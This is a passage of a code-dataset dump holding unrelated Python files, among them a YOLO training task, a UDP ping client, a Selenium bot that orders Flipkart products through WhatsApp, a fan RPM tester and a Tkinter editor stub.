'source_id': label['groundtruths']['source_id'],\n 'image_info': label['groundtruths']['image_info']\n }\n\n # Compute all metrics\n if metrics:\n logs.update(\n {self.coco_metric.name: (label['groundtruths'], coco_model_outputs)})\n for m in metrics:\n m.update_state(loss_metrics[m.name])\n logs.update({m.name: m.result()})\n return logs\n\n def aggregate_logs(self, state=None, step_outputs=None):\n \"\"\"Get Metric Results.\"\"\"\n if not state:\n self.coco_metric.reset_states()\n state = self.coco_metric\n self.coco_metric.update_state(step_outputs[self.coco_metric.name][0],\n step_outputs[self.coco_metric.name][1])\n return state\n\n def reduce_aggregated_logs(self, aggregated_logs, global_step=None):\n \"\"\"Reduce logs and remove unneeded items. Update with COCO results.\"\"\"\n res = self.coco_metric.result()\n return res\n\n def initialize(self, model: tf.keras.Model):\n \"\"\"Loading pretrained checkpoint.\"\"\"\n\n if not self.task_config.init_checkpoint:\n logging.info('Training from Scratch.')\n return\n\n ckpt_dir_or_file = self.task_config.init_checkpoint\n if tf.io.gfile.isdir(ckpt_dir_or_file):\n ckpt_dir_or_file = tf.train.latest_checkpoint(ckpt_dir_or_file)\n\n # Restoring checkpoint.\n if self.task_config.init_checkpoint_modules == 'all':\n ckpt = tf.train.Checkpoint(**model.checkpoint_items)\n status = ckpt.read(ckpt_dir_or_file)\n status.expect_partial().assert_existing_objects_matched()\n else:\n ckpt_items = {}\n if 'backbone' in self.task_config.init_checkpoint_modules:\n ckpt_items.update(backbone=model.backbone)\n if 'decoder' in self.task_config.init_checkpoint_modules:\n ckpt_items.update(decoder=model.decoder)\n\n ckpt = tf.train.Checkpoint(**ckpt_items)\n status = ckpt.read(ckpt_dir_or_file)\n status.expect_partial().assert_existing_objects_matched()\n\n logging.info('Finished loading pretrained checkpoint from %s',\n ckpt_dir_or_file)\n\n def create_optimizer(self,\n optimizer_config: OptimizationConfig,\n runtime_config: Optional[RuntimeConfig] = None):\n \"\"\"Creates an TF optimizer from configurations.\n\n Args:\n optimizer_config: the parameters of the Optimization settings.\n runtime_config: the parameters of the runtime.\n\n Returns:\n A tf.optimizers.Optimizer object.\n \"\"\"\n opt_factory = optimization.YoloOptimizerFactory(optimizer_config)\n # pylint: disable=protected-access\n ema = opt_factory._use_ema\n opt_factory._use_ema = False\n\n opt_type = opt_factory._optimizer_type\n if opt_type == 'sgd_torch':\n optimizer = opt_factory.build_optimizer(opt_factory.build_learning_rate())\n optimizer.set_bias_lr(\n opt_factory.get_bias_lr_schedule(self._task_config.smart_bias_lr))\n optimizer.search_and_set_variable_groups(self._model.trainable_variables)\n else:\n optimizer = opt_factory.build_optimizer(opt_factory.build_learning_rate())\n opt_factory._use_ema = ema\n\n if ema:\n logging.info('EMA is enabled.')\n optimizer = opt_factory.add_ema(optimizer)\n\n # pylint: enable=protected-access\n\n if runtime_config and runtime_config.loss_scale:\n use_float16 = runtime_config.mixed_precision_dtype == 'float16'\n optimizer = performance.configure_optimizer(\n optimizer,\n use_float16=use_float16,\n loss_scale=runtime_config.loss_scale)\n\n return optimizer\n","sub_path":"official/projects/yolo/tasks/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":16647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422156811","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nrequires = [\n 'sqlalchemy',\n 'flask-sqlalchemy',\n 'flask-migrate',\n 'alembic',\n 'flask',\n 'pysqlite'\n]\n\n\nsetup(\n name='outpost',\n version='0.0.1',\n description='outpost',\n long_description='Ansible control server',\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n install_requires=requires,\n tests_requires=requires,\n entry_points={\n 'console_scripts': [\n 'outpost = outpost.server.server:main'\n ]\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"197498218","text":"import socket\nimport time\nimport sys\n\nif len(sys.argv) > 2:\n total_pings_toSend = int(sys.argv[2])\nelse:\n total_pings_toSend = 4\n\naddress = sys.argv[1]\nport = 2000\npong_server_address = (address, port)\nping_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nrrt_counter = 0\ntimeouts_counter = 0\npings_counter = 0\ntotal_pings_sent = 0\n\nwhile total_pings_sent < total_pings_toSend:\n if pings_counter == 1000:\n pings_counter = 0\n\n ping_socket.settimeout(5.0)\n ping_messge = \"PING-\" + str(pings_counter)\n ping_socket.sendto(ping_messge, pong_server_address)\n ping_sent_at = time.time()\n\n try:\n pong_message, pong_server_address = ping_socket.recvfrom(1024)\n pong_received_at = time.time()\n round_trip_time = (pong_received_at - ping_sent_at)\n round_trip_time = int(round(round_trip_time * 1000))\n print(str(pings_counter) + \": \" + str(round_trip_time) + \"ms\")\n rrt_counter += round_trip_time\n except socket.timeout:\n print(str(pings_counter) + \": \" + 'timeout')\n timeouts_counter += 1\n pings_counter += 1\n total_pings_sent += 1\n time.sleep(0.1)\n\nprint(\"AVG=\" + str(rrt_counter / total_pings_sent) + \" TIMEOUTS=\" + str(timeouts_counter))\n","sub_path":"Assignment4_UDP_PingPong/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"578340897","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nno_products = []\nl1 = []\n\n#takes input of the flipkart id and password\nemail1 = input(\"Enter your Flipkart Email ID: \")\npassword1 = input(\"Enter your FLipkart Password: \")\n\n#list of daily needed products\ndaily_products = [\"Surf Excel Matic Detergent Powder Top load ( 2 kg ) 2 kg Washing Powder\",\"xiaomi mi 4\",\"Pears Pure & Gentle Bathing Bar (375 g, Pack of 3)\",\"Dove Daily Shine Shampoo (650 ml)\",\"Joy Honey & Almonds Advanced Nourishing Body Lotion(Pack of 2 x 300 ml) (600 ml)\",\"Vim Dish Cleaning Gel (Lemon)\"]\n\n\nbrowser1 = webdriver.Chrome(executable_path = r\"./chromedriver\")\nbrowser1.get(\"https://web.whatsapp.com/\") #Opens Whatsapp Web\ntime.sleep(12)\n\n#Searches a group named Flipkart in whatsapp web\nbrowser1.find_element_by_xpath(\"//*[@id='side']/div[1]/div/label/input\").click()\ngroup = browser1.find_element_by_css_selector(\"input.jN-F5.copyable-text.selectable-text\")\ngroup.send_keys(\"Flipkart\")\ntime.sleep(5)\n\n#opens the flipkart whatsapp group\nbrowser1.find_element_by_class_name('dIyEr').click()\ntime.sleep(2)\n\n#displays the list of daily products to the rest of the group members\n#the serial numbers of the products correspond to the number by which the members can order stuff\nfgroup5 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\nfor i in range(len(daily_products)):\n fgroup5.send_keys(str(i) + \") \" + daily_products[i])\n fgroup5.send_keys(Keys.ENTER)\n time.sleep(2)\n\n#this displays that portal is open to take orders\nfgroup4 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\nfgroup4.send_keys(\"OPEN\")\nfgroup4.send_keys(Keys.ENTER)\n\n\n#this list contains the text on the page\np = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n\ntime.sleep(2)\nproduct = p[-1].text\n\n#this loop is basically to check the OPEN text\nwhile(product == \"OPEN\"):\n p = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n time.sleep(2)\n product = p[-1].text\n\n\n#main loop\nwhile(product[0] != \"OPEN\"):\n no_products = []\n #this displays that your order is in process\n fgroup1 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n fgroup1.send_keys(\"ORDER IN PROCESS\")\n time.sleep(2)\n fgroup1.send_keys(Keys.ENTER)\n time.sleep(2)\n\n #opens flipkart\n browser = webdriver.Chrome(executable_path = r\"./chromedriver\")\n browser.get(\"https://www.flipkart.com/\")\n time.sleep(2)\n \n #enters email id\n email = browser.find_element_by_css_selector(\"input._2zrpKA\")\n email.send_keys(email1)\n\n \n time.sleep(2)\n\n #enters password\n try:\n browser.find_element_by_xpath(\"/html/body/div[2]/div/div/div/div/div[2]/div/form/div[2]/input\").click()\n password = browser.find_element_by_css_selector(\"input._2zrpKA._3v41xv\")\n password.send_keys(password1)\n time.sleep(2)\n\n except:\n\n browser.find_element_by_xpath(\"/html/body/div[2]/div/div/div/div/div[2]/div/form/div[2]/button\").click()\n password2 = browser.find_element_by_css_selector(\"input._2zrpKA._3v41xv\")\n password2.send_keys(password1)\n time.sleep(2)\n \n browser.find_element_by_xpath(\"/html/body/div[2]/div/div/div/div/div[2]/div/form/div[3]/button\").click()\n\n time.sleep(2)\n #for searching in the search bar\n browser.find_element_by_xpath(\"//*[@id='container']/div/header/div[1]/div/div[2]/form/div/div[1]/div/input\")\n\n time.sleep(2)\n\n i = 0;\n j = 0;\n #loop for multiple item orders\n while(product[i] != 'S'):\n item = browser.find_element_by_css_selector(\"input.LM6RPg\")\n item.send_keys(daily_products[int(product[i])])\n item.send_keys(Keys.ENTER)\n time.sleep(8)\n browser.find_element_by_xpath(\"//*[@id='container']/div/div[1]/div[2]/div/div[1]/div[2]/div[2]/div/div[1]/div/a[2]\").click()\n time.sleep(8)\n #this is basically changing the browser window \n l = (browser.window_handles)\n browser.switch_to_window(l[j+1])\n time.sleep(5)\n try:\n browser.find_element_by_xpath(\"//*[@id='container']/div/div[1]/div[2]/div/div[1]/div[1]/div[2]/div/ul/li[1]/button\").click()\n except:\n no_products.append(int(product[i]))\n\n i+=2\n j+=1\n time.sleep(5)\n browser.find_element_by_xpath(\"//*[@id='container']/div/div[1]/div/div[1]/div/div[3]/form/button\").click()\n\n time.sleep(3)\n\n browser1.find_element_by_xpath(\"//*[@id='main']/footer/div[1]/div[2]/div/div[2]\").click()\n time.sleep(2)\n\n fgroup3 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n \n #this will display products that are not available \n if(len(no_products) > 0):\n for i in range(len(no_products)):\n fgroup3.send_keys(\"Product with code \" + str(no_products[i]) + \" is not available\")\n fgroup3.send_keys(Keys.ENTER)\n\n\n #this will send the link of the checkout in the whatsapp group to the user\n fgroup = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n fgroup.send_keys(browser.current_url)\n time.sleep(2)\n fgroup.send_keys(Keys.ENTER)\n \n #quits the flipkart browser\n browser.quit()\n\n\n\n \n fgroup2 = browser1.find_element_by_css_selector(\"div._2S1VP.copyable-text.selectable-text\")\n fgroup2.send_keys(\"Please proceed for checkout by clicking the above link.\")\n time.sleep(2)\n fgroup2.send_keys(Keys.ENTER)\n fgroup2.send_keys(\"OPEN\")\n fgroup2.send_keys(Keys.ENTER)\n time.sleep(2)\n\n\n p = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n time.sleep(2)\n product = p[-1].text\n\n time.sleep(2)\n \n #checks for more orders\n while(product == \"OPEN\"):\n p = browser1.find_elements_by_css_selector(\"span.selectable-text.invisible-space.copyable-text\")\n time.sleep(2)\n product = p[-1].text\n\n","sub_path":"zense_project.py","file_name":"zense_project.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"109926374","text":"import math\nimport numpy as np\nfrom trader import StockTrader\nimport matplotlib.pyplot as plt\nfrom agents.UCRP import UCRP\nfrom agents.Loser import Loser\nfrom agents.Winner import Winner\nimport logging\nlogger = logging.getLogger()\n\n\ndef parse_info(info):\n return info['reward'], info['continue'], info['next state'], info['weight vector'], info['price'], info['risk']\n\n\ndef traversal(stocktrader, agent, env, epoch, noise_flag, framework, method, trainable):\n info = env.step(None, None, noise_flag)\n r, done, state, w1, p, risk = parse_info(info)\n done = 1\n t = 0\n\n while done:\n w2 = agent.predict(state, w1)\n env_info = env.step(w1, w2, noise_flag)\n r, done, s_next, w1, p, risk = parse_info(env_info)\n if framework == 'PG':\n agent.save_transition(state, p, w2, w1)\n else:\n agent.save_transition(state, w2, r-risk, done, s_next, w1)\n loss, q_value, actor_loss = 0, 0, 0\n\n if framework == 'DDPG':\n if not done and trainable:\n agent_info = agent.train(method, epoch)\n loss, q_value = agent_info[\"critic_loss\"], agent_info[\"q_value\"]\n if method == 'model_based':\n actor_loss = agent_info[\"actor_loss\"]\n\n elif framework == 'PPO':\n if not done and trainable:\n agent_info = agent.train(method, epoch)\n loss, q_value = agent_info[\"critic_loss\"], agent_info[\"q_value\"]\n if method == 'model_based':\n actor_loss = agent_info[\"actor_loss\"]\n\n elif framework == 'PG':\n if not done and trainable:\n agent.train()\n\n stocktrader.update_summary(loss, r, q_value, actor_loss, w2, p)\n t = t + 1\n\n\ndef backtest(agent, env, path, framework):\n logger.debug(\"Backtest\")\n\n agents = []\n agents.extend(agent)\n agents.append(UCRP())\n agents.append(Loser())\n agents.append(Winner())\n labels = [framework, 'UCRP', \"Loser\", \"Winner\"]\n\n wealths_result = []\n rs_result = []\n for i, agent in enumerate(agents):\n stocktrader = StockTrader()\n info = env.step(None, None, False)\n r, done, s, w1, p, risk = parse_info(info)\n done = 1\n wealth = 10000000\n wealths = [wealth]\n rs = [1]\n while done:\n w2 = agent.predict(s, w1)\n env_info = env.step(w1, w2, False)\n r, done, s_next, w1, p, risk = parse_info(env_info)\n wealth = wealth * math.exp(r)\n rs.append(math.exp(r)-1)\n wealths.append(wealth)\n s = s_next\n stocktrader.update_summary(0, r, 0, 0, w2, p)\n\n stocktrader.write(map(lambda x: str(x), env.get_codes()), labels[i])\n logger.debug('Finished agents {}'.format(i))\n wealths_result.append(wealths)\n rs_result.append(rs)\n\n logger.info('资产名称 \\t 平均日收益率 \\t 夏普率 \\t 最大回撤')\n plt.figure(figsize=(8, 6), dpi=100)\n for i in range(len(agents)):\n plt.plot(wealths_result[i], label=labels[i])\n mrr = float(np.mean(rs_result[i])*100)\n sharpe = float(np.mean(rs_result[i])/np.std(rs_result[i])*np.sqrt(252))\n maxdrawdown = float(max(1 - min(wealths_result[i]) / np.maximum.accumulate(wealths_result[i])))\n logger.info(\"%s \\t %s \\t %s \\t %s\", labels[i], round(mrr, 3), round(sharpe, 3), round(maxdrawdown, 3))\n plt.legend()\n plt.savefig(path + 'backtest.png')\n #plt.show()\n\n\ndef parse_config(config, mode):\n num_codes = config[\"num_codes\"]\n start_date = config[\"start_date\"]\n end_date = config[\"end_date\"]\n features = config[\"features\"]\n agent_config = config[\"agents\"]\n market = config[\"mark_types\"]\n noise_flag, record_flag, plot_flag = config[\"noise_flag\"], config[\"record_flag\"], config[\"plot_flag\"]\n predictor, framework, window_length = agent_config\n reload_flag, trainable = config['reload_flag'], config['trainable']\n method = config['method']\n epochs = config['epochs']\n if mode == 'test':\n record_flag = True\n noise_flag = False\n plot_flag = True\n reload_flag = True\n trainable = False\n method = 'model_free'\n\n logger.info(\"Status:\")\n logger.info(\"Date: %s - %s\", start_date, end_date)\n logger.info('Features: %s', features)\n logger.info(\"Predictor: %s, Framework %s, Window Length: %s\", predictor, framework, window_length)\n logger.info(\"Epochs: %d\", epochs)\n logger.info(\"Trainable: %d\", trainable)\n logger.info(\"Reloaded Model: %d\", reload_flag)\n logger.info(\"Method: %s\", method)\n logger.info(\"Noise_flag: %d\", noise_flag)\n logger.info(\"Record_flag: %d\", record_flag)\n logger.info(\"Plot_flag %d: \", plot_flag)\n\n return num_codes, start_date, end_date, features, agent_config, market, predictor, framework, window_length, \\\n noise_flag, record_flag, plot_flag, reload_flag, trainable, method, epochs\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"539926261","text":"class Solution:\n def minMoves(self, nums: List[int], limit: int) -> int:\n res, curr=float('inf'), 0\n d=collections.defaultdict(int)\n n=len(nums)\n for i in range(n//2):\n a, b=nums[i], nums[n-i-1]\n d[2]+=2\n d[min(a, b)+1]-=1\n d[a+b]-=1\n d[a+b+1]+=1\n d[max(a,b)+limit+1]+=1\n \n for i in range(2, 2*limit+1):\n curr+=d[i]\n res=min(res, curr)\n return res\n \n","sub_path":"python/minimum-moves-to-make-array-complementary.py","file_name":"minimum-moves-to-make-array-complementary.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"420096823","text":"import os\nimport os.path\nimport shutil\n\nbase_dir = r'/root/torrent/'\nlocal_dir = \"D:\\\\mac_torrent\\\\\"\n\n\ndef create_abs_path(dir):\n for root, dirs, files in os.walk(dir):\n for name in files:\n filename =base_dir + dir.split('\\\\')[-2] + r'/' + name\n with open(dir+\"files.txt\",\"a+\") as f:\n f.write(filename+'\\n')\n\n\ndef main():\n count = 0\n current_split_dir = 1\n for root, dirs, files in os.walk(local_dir):\n for name in files:\n complete_dir = local_dir + str(current_split_dir) + '\\\\'\n if not os.path.exists(complete_dir):\n os.mkdir(complete_dir)\n count += 1\n shutil.move(local_dir+name,complete_dir)\n if count % 400 == 0:\n create_abs_path(complete_dir)\n current_split_dir += 1\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"torrent_tools/split_torrent_forder.py","file_name":"split_torrent_forder.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"192008563","text":"import pandas as pd\r\nimport re\r\n\r\n\r\ndef check_entity_data(q, e):\r\n number_of_error = 0\r\n for i, data in enumerate(zip(q, e)):\r\n\r\n s = str(data[0]).split(' ')\r\n e = str(data[1]).split(' ')\r\n\r\n if len(s) != len(e):\r\n print(i, s, e)\r\n number_of_error += 1\r\n\r\n return number_of_error\r\n\r\n\r\ndef convert():\r\n f = pd.read_csv('data/convert/testfile.csv', delimiter=',', encoding='utf-8')\r\n question = [re.sub('\\t', '', s) for s in f['question'].tolist()]\r\n entity = []\r\n for i, e in enumerate(f['entity'].tolist()):\r\n while '\\t\\t' in e:\r\n e = re.sub('\\t\\t', '\\t', str(e))\r\n print(i)\r\n\r\n if e[len(e) - 1] == '\\t':\r\n e = e[0:len(e) - 1]\r\n\r\n e = re.sub('\\t', ' ', e)\r\n entity.append(e)\r\n\r\n if check_entity_data(question, entity) != 0:\r\n raise Exception(\"number of token and entity must be same !\")\r\n\r\n f = pd.DataFrame(data=zip(question, entity))\r\n f.to_csv('data/convert/testfile_convert.csv', index=False)\r\n\r\n\r\nif __name__ == '__main__':\r\n convert()\r\n","sub_path":"data/convert/test_convert.py","file_name":"test_convert.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"314448846","text":"\"\"\"\n题目:https://leetcode-cn.com/problems/find-minimum-in-rotated-sorted-array-ii/\n\"\"\"\nfrom typing import List\n\nclass Solution:\n # 遍历查找\n def findMin(self,nums:List[int])->int:\n if not nums:\n return\n\n res = nums[0]\n for i in range(1,len(nums)):\n if nums[i]>=nums[i-1]:\n i += 1\n else:\n res = nums[i]\n return res\n\n # 二分查找\n def findMinByPivot(self,nums:List[int])->int:\n if not nums:\n return\n\n low,high = 0,len(nums)-1\n while low nums[high]:\n low = pivot + 1\n else :\n high -= 1\n return nums[low]\n\nnums = [3,4,4,5,1,1,2]\n# nums = [2,2,2,0,1]\n# nums = [1,1,0,0,1,1]\nsolution = Solution()\nprint(solution.findMin(nums))\nprint(solution.findMinByPivot(nums))","sub_path":"LC/lc154_寻找旋转排序数组中的最小值II[非严格有序]_20210409.py","file_name":"lc154_寻找旋转排序数组中的最小值II[非严格有序]_20210409.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204354824","text":"valores = []\n\nfor v in range(0,5):\n valores.append(int(input('Adicione um numero: ')))\n\nfor p, n in enumerate(valores):\n if n == max(valores):\n print(f'O maior numero é {n} nas posicoes {p}...',end='')\n elif n == min(valores):\n print(f'O menor numero é {n} nas posicoes {p}...',end='')\n","sub_path":"Exercicios_Python/exercicio78.py","file_name":"exercicio78.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"482678990","text":"import time\nimport pigpio\nimport sys\n\nFILE_OUTPUT_NAME = ''\n\nclass reader:\n\n def __init__(self, pi, gpio, pwm, pulses_per_rev = 1.0, weighting = 0.0, min_RPM = 5.0):\n\n self.pi = pi\n self.gpio = gpio\n self.pwm = pwm\n self.pulses_per_rev = pulses_per_rev\n self.rpm_data = []\n\n if min_RPM > 1000.0:\n min_RPM = 1000.0\n elif min_RPM < 1.0:\n min_RPM = 1.0\n\n self.min_RPM = min_RPM\n self._watchdog = 200 # milliseconds\n\n if weighting < 0.0:\n weighting = 0.0\n elif weighting > 0.99:\n weighting = 0.99\n\n self._new = 1.0 - weighting\n self._old = weighting\n\n self._high_tick = None\n self._period = None\n\n pi.set_mode(gpio, pigpio.INPUT)\n\n self._cb = pi.callback(gpio, pigpio.RISING_EDGE, self._cbf)\n pi.set_watchdog(gpio, self._watchdog)\n\n def _cbf(self, gpio, level, tick):\n if level == 1:\n\n if self._high_tick is not None:\n t = pigpio.tickDiff(self._high_tick, tick)\n\n if self._period is not None:\n self._period = (self._old * self._period) + (self._new * t)\n\n else:\n self._period = t\n\n self._high_tick = tick\n\n elif level == 2:\n\n if self._period is not None:\n if self._period < 2000000000:\n self._period += (self._watchdog * 1000)\n \n def PWM(self, duty):\n self.pi.hardware_PWM(self.pwm, 25000, duty * 10000)\n \n def RPM(self):\n\n RPM = 0.0\n if self._period is not None:\n RPM = 60000000.0 / (self._period * self.pulses_per_rev)\n if RPM < self.min_RPM:\n RPM = 0.0\n return RPM\n\n def calc_rpm(self):\n temp_sum = 0\n if(len(self.rpm_data) ==0):\n return 0\n else:\n for i in range(0, len(self.rpm_data)):\n temp_sum += self.rpm_data[i]\n return ((temp_sum/2)/(len(self.rpm_data) - 1))\n\n\n\n def cancel(self):\n self.pi.hardware_PWM(self.pwm, 25000, 0)\n self.pi.set_watchdog(self.gpio, 0)\n self._cb.cancel()\n\ndef message_display(msg, desired_answer):\n while(1):\n if input(msg).lower() == desired_answer:\n return 1\n else:\n print('\\033c')\n print(\"*****************************\")\n print(\"Incorrect character entered.\")\n print(\"*****************************\")\n return 0\n\ndef main(mode, RUN_TIME, DUTY):\n\n RPM_GPIO = 4\n PWM_GPIO = 19\n\n SAMPLE_TIME = 5\n\n print('\\033c')\n print(f\"\\nTESTING MODE {mode + 1}...\\n\")\n\n pi = pigpio.pi()\n\n p = fan_main.reader(pi, RPM_GPIO, PWM_GPIO)\n \n p.PWM(DUTY)\n\n start = time.time()\n\n while (time.time() - start) < RUN_TIME:\n try:\n \n time.sleep(SAMPLE_TIME)\n\n RPM = p.RPM()\n if((time.time() - start) > 30):\n p.rpm_data.append(RPM)\n\n print('\\033c')\n print(\"Time: {} \".format(round(time.time() - start), 1) + \"RPM = {}\".format(int(RPM+0.5)/2) + \" (Press CTRL + C to STOP\")\n \n except KeyboardInterrupt:\n print(\"*****************************\")\n print(\"\\nTest Cancelled\\n\")\n print(\"*****************************\")\n p.cancel()\n rpm_avg = p.calc_rpm()\n print(f\"Average RPM of Test: {rpm_avg}\")\n return 0\n \n finally:\n pass\n\n p.cancel()\n rpm_avg = p.calc_rpm()\n\n return rpm_avg\n\ndef user_input(message, limit):\n mode_max = input(message)\n if (mode_max.isnumeric()) and (int(mode_max) < limit):\n return int(mode_max)\n else:\n return 0\n\ndef display_results(RPM_AVG, settings):\n print(\"\\nTEST RESULTS:\\n\")\n for i in range(0, len(settings[0])):\n print(f\"Mode = {i+1}, Duration = {settings[0][i]}, PWM = {settings[1][i]} %, Avg RPM = {round(RPM_AVG[i], 1)}\")\n\ndef start_sequence():\n settings = [[],[]]\n\n print('\\033c')\n print(\"*****************************\")\n print(\"\\nNURO FAN TESTING\\n\")\n print(\"To stop the test at anytime, hold 'CTRL + C'\\n\")\n print(\"*****************************\\n\")\n\n mode_max = user_input(\"Enter number of settings (max 10):\", 10)\n\n for i in range(0, mode_max):\n settings[0].append(user_input(f\"Enter mode {i + 1} duration (mins):\", 60000)) # max 1000 hours\n settings[1].append(user_input(f\"Enter mode {i + 1} PWM %:\", 96)) # max duty cycle 96%\n\n return settings\n\n\nif __name__ == \"__main__\":\n \n import time\n import pigpio\n import fan_main\n \n while(1):\n RPM_AVG = []\n\n settings = start_sequence()\n\n FILE_OUTPUT_NAME = str(datetime.datetime.now().replace(microsecond=0))\n file_raw = open(\"/home/pi/Documents/FAN_DATA_FOLDER/\" + FILE_OUTPUT_NAME + \"_RAW\", 'w', newline='')\n\n if(os.path.exists(\"/home/pi/Documents/FAN_DATA_FOLDER/FILE_MAIN\")):\n file = open(\"/home/pi/Documents/FAN_DATA_FOLDER/FILE_MAIN\", 'a', newline = '')\n pass\n else:\n file = open(\"/home/pi/Documents/FAN_DATA_FOLDER/FILE_MAIN\", 'w', newline = '')\n writer = csv.writer(file)\n HEADER = [\"MODE\", \"REPETITION\", \"TIMESTAMP\", \"PWM\", \"RPM\"]\n writer.writerow(HEADER)\n \n if not settings:\n break\n else:\n while(message_display(\"\\nTo begin testing, press '1' and ENTER: \", '1') != 1):\n pass\n for i in range(0, len(settings[0])):\n RPM_AVG.append(main(i, settings[0][i], settings[1][i]))\n time.sleep(3)\n #while(message_display(\"To continue, press '2' and ENTER: \", '2') != 1):\n # pass\n display_results(RPM_AVG, settings)\n while(message_display(\"To continue, press '2' and ENTER: \", '2') != 1):\n pass","sub_path":"fan/fan_main.py","file_name":"fan_main.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"69676177","text":"from imutils import paths\nimport argparse\nimport cv2\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"path to input directory of images\")\nap.add_argument(\"-t\", \"--threshold\", type=float, default=100.0, help=\"focus measures that fall below this value will be considered 'blurry'\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nfm = cv2.Laplacian(image, cv2.CV_64F).var()\ntext = \"Not Blurry\"\n\nif fm < args[\"threshold\"]: #keep tweeking the threshold as per your requirements\n text = \"Blurry\"\n\ncv2.putText(image, \"{}: {:.2f}\".format(text, fm), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 3)\ncv2.imshow(\"Image\", image)\nkey = cv2.waitKey(0)\n","sub_path":"blurDetection.py","file_name":"blurDetection.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537134006","text":"def is_parent(child, parent):\n return child == parent or any(map(lambda p: is_parent(p, parent), parents[child]))\n\n\nparents = {}\n\nfor _ in range(int(input())):\n a = input().split()\n parents[a[0]] = [] if len(a) == 1 else a[2:]\n \nexcepts = []\n\nfor _ in range(int(input())):\n excpt = input()\n \n for k in excepts:\n if is_parent(excpt, k):\n print(excpt)\n break\n \n excepts.append(excpt)\n\n\n","sub_path":"python basics and applications/2/2-1/2-1-2.py","file_name":"2-1-2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"92693592","text":"import os.path\r\nimport sys\r\nimport json\r\nimport importlib\r\nimport tkinter\r\nimport tkinter.filedialog\r\nimport tkinter.messagebox\r\nimport urllib.request\r\n\r\nclass popupWindow:\r\n def __init__(self, root, text):\r\n top = self.top = tkinter.Toplevel(root)\r\n self.l = tkinter.Label(top, text=text)\r\n self.l.pack()\r\n self.e = tkinter.Entry(top)\r\n self.e.pack()\r\n self.b = tkinter.Button(top, text='Done', command=self.cleanup)\r\n self.b.pack()\r\n\r\n def cleanup(self):\r\n self.value = self.e.get()\r\n self.top.destroy()\r\n\r\nclass main:\r\n def __init__(self, root, textPad, menu):\r\n self.root = root\r\n self.textPad = textPad\r\n self.menu = menu\r\n self.name = \"Untitled\"\r\n self.root.title(\"Blu's Modular Editor 0.2.0: \" + self.name)\r\n\r\n self.filemenu = tkinter.Menu(self.menu)\r\n self.menu.add_cascade(label=\"File\", menu=self.filemenu)\r\n self.filemenu.add_command(label=\"New\", command=self.newCommand)\r\n self.filemenu.add_command(label=\"Open...\", command=self.openCommand)\r\n self.filemenu.add_command(label=\"Save\", command=self.saveCommand)\r\n self.filemenu.add_separator()\r\n self.filemenu.add_command(label=\"Restart\", command=self.restartCommand)\r\n self.filemenu.add_command(label=\"Exit\", command=self.exitCommand)\r\n\r\n self.helpmenu = tkinter.Menu(self.menu)\r\n self.menu.add_cascade(label=\"Help\", menu=self.helpmenu)\r\n self.helpmenu.add_command(label=\"About...\", command=self.aboutCommand)\r\n\r\n self.modulesmenu = tkinter.Menu(self.menu)\r\n self.menu.add_cascade(label=\"Modules\", menu=self.modulesmenu)\r\n self.modulesmenu.add_command(label=\"Download module\", command=self.downloadModuleCommand)\r\n self.modulesmenu.add_command(label=\"Load module\", command=self.loadModuleCommand)\r\n self.modulesmenu.add_command(label=\"Unload module\", command=self.unloadModuleCommand)\r\n\r\n self.path = os.path.dirname(os.path.abspath(__file__))\r\n\r\n def ret(self):\r\n return self.root, self.textPad, self.menu\r\n\r\n def newCommand(self):\r\n data = self.textPad.get('1.0', 